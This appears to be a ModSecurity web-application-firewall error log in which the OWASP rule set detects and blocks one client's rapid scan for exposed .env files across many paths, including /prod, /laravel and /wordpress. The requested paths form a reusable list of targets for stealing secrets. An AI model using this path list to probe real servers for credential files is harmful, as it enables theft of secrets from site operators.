[Mon May 11 18:03:12.647664 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wEWKUxpmnkK7zHyhrgAAAQQ"]
[Mon May 11 18:03:12.814365 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /htdocs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/htdocs/.env"] [unique_id "agH9wEWKUxpmnkK7zHyhrwAAAQQ"]
[Mon May 11 18:03:12.814695 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/htdocs/.env"] [unique_id "agH9wEWKUxpmnkK7zHyhrwAAAQQ"]
[Mon May 11 18:03:12.815206 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wEWKUxpmnkK7zHyhrwAAAQQ"]
[Mon May 11 18:03:12.988286 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/www/.env"] [unique_id "agH9wEWKUxpmnkK7zHyhsAAAAQQ"]
[Mon May 11 18:03:12.988510 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/www/.env"] [unique_id "agH9wEWKUxpmnkK7zHyhsAAAAQQ"]
[Mon May 11 18:03:12.988850 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wEWKUxpmnkK7zHyhsAAAAQQ"]
[Mon May 11 18:03:13.221049 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/html/.env"] [unique_id "agH9wUWKUxpmnkK7zHyhswAAAQQ"]
[Mon May 11 18:03:13.221295 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/html/.env"] [unique_id "agH9wUWKUxpmnkK7zHyhswAAAQQ"]
[Mon May 11 18:03:13.221623 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wUWKUxpmnkK7zHyhswAAAQQ"]
[Mon May 11 18:03:13.379067 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/live/.env"] [unique_id "agH9wUWKUxpmnkK7zHyhtAAAAQQ"]
[Mon May 11 18:03:13.379309 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/live/.env"] [unique_id "agH9wUWKUxpmnkK7zHyhtAAAAQQ"]
[Mon May 11 18:03:13.379613 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wUWKUxpmnkK7zHyhtAAAAQQ"]
[Mon May 11 18:03:13.572527 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/prod/.env"] [unique_id "agH9wUWKUxpmnkK7zHyhtgAAAQQ"]
[Mon May 11 18:03:13.572743 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/prod/.env"] [unique_id "agH9wUWKUxpmnkK7zHyhtgAAAQQ"]
[Mon May 11 18:03:13.573118 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wUWKUxpmnkK7zHyhtgAAAQQ"]
[Mon May 11 18:03:13.733051 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/dev/.env"] [unique_id "agH9wUWKUxpmnkK7zHyhtwAAAQQ"]
[Mon May 11 18:03:13.733287 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/dev/.env"] [unique_id "agH9wUWKUxpmnkK7zHyhtwAAAQQ"]
[Mon May 11 18:03:13.733592 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wUWKUxpmnkK7zHyhtwAAAQQ"]
[Mon May 11 18:03:13.896335 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/staging/.env"] [unique_id "agH9wUWKUxpmnkK7zHyhuAAAAQQ"]
[Mon May 11 18:03:13.896570 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/staging/.env"] [unique_id "agH9wUWKUxpmnkK7zHyhuAAAAQQ"]
[Mon May 11 18:03:13.896861 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wUWKUxpmnkK7zHyhuAAAAQQ"]
[Mon May 11 18:03:14.068521 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/opt/.env"] [unique_id "agH9wkWKUxpmnkK7zHyhuQAAAQQ"]
[Mon May 11 18:03:14.068755 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/opt/.env"] [unique_id "agH9wkWKUxpmnkK7zHyhuQAAAQQ"]
[Mon May 11 18:03:14.069053 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wkWKUxpmnkK7zHyhuQAAAQQ"]
[Mon May 11 18:03:14.251945 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/laravel/.env"] [unique_id "agH9wkWKUxpmnkK7zHyhugAAAQQ"]
[Mon May 11 18:03:14.252194 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/laravel/.env"] [unique_id "agH9wkWKUxpmnkK7zHyhugAAAQQ"]
[Mon May 11 18:03:14.252489 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wkWKUxpmnkK7zHyhugAAAQQ"]
[Mon May 11 18:03:14.416336 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/symfony/.env"] [unique_id "agH9wkWKUxpmnkK7zHyhuwAAAQQ"]
[Mon May 11 18:03:14.416551 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/symfony/.env"] [unique_id "agH9wkWKUxpmnkK7zHyhuwAAAQQ"]
[Mon May 11 18:03:14.416824 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wkWKUxpmnkK7zHyhuwAAAQQ"]
[Mon May 11 18:03:14.581556 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wordpress/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/wordpress/.env"] [unique_id "agH9wkWKUxpmnkK7zHyhvgAAAQQ"]
[Mon May 11 18:03:14.581858 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/wordpress/.env"] [unique_id "agH9wkWKUxpmnkK7zHyhvgAAAQQ"]
[Mon May 11 18:03:14.582198 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wkWKUxpmnkK7zHyhvgAAAQQ"]
[Mon May 11 18:03:14.759722 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/wp/.env"] [unique_id "agH9wkWKUxpmnkK7zHyhvwAAAQQ"]
[Mon May 11 18:03:14.759965 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/wp/.env"] [unique_id "agH9wkWKUxpmnkK7zHyhvwAAAQQ"]
[Mon May 11 18:03:14.760316 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wkWKUxpmnkK7zHyhvwAAAQQ"]
[Mon May 11 18:03:14.921664 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cms/.env"] [unique_id "agH9wkWKUxpmnkK7zHyhwAAAAQQ"]
[Mon May 11 18:03:14.921901 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cms/.env"] [unique_id "agH9wkWKUxpmnkK7zHyhwAAAAQQ"]
[Mon May 11 18:03:14.922208 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wkWKUxpmnkK7zHyhwAAAAQQ"]
